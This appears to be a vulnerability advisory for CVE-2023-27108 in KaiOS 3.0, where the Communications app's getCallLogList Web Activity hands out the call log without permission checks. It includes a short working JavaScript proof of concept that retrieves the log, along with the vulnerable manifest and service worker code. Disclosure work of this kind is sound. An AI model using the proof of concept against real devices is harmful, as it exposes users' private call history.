Headline
CVE-2023-27108: KaiOS getCallLogList Activity
An issue was discovered in KaiOS 3.0. The pre-installed Communications application exposes a Web Activity that returns the user’s call log without origin or permission checks. An attacker can inject a JavaScript payload that runs in a browser or app without user interaction or consent. This allows an attacker to send the user’s call logs to a remote server via XMLHttpRequest or Fetch.
let activity = new WebActivity('getCallLogList’, {
type: “calllog/tel”
});
activity.start()
.then((callLogs) => {
console.log(callLogs); // Array[]
});
/*
Exposed via pre-installed Communications app
Manifest URL: http://communications.localhost/manifest.webmanifest
manifest.webmanifest
"activities": {
"getCallLogList": {
"filters": {
"type": {
"required": true,
"value": [
“calllog/tel”
]
}
},
"returnValue": true
}
}
serviceWorker.js
let handler = null;
const db = new DB();
let pickHandler = null;
let getListHandler = null;
self.onsystemmessage = evt => {
console.log('communications onsystemmessage: ' + evt.name);
let data = null;
let viewInfo = null;
evt.waitUntil(
(() => {
switch (evt.name) {
case 'activity’:
handler = evt.data.webActivityRequestHandler();
if (handler.source.name === ‘getCallLogList’) {
getListHandler = handler;
db.getAllData()
.then(list => {
getListHandler.postResult(list);
getListHandler = null;
})
.catch(() => {
getListHandler.postResult([]);
getListHandler = null;
});
}
break;
default:
console.log(‘Illegal message’);
}
})()
);
};
*/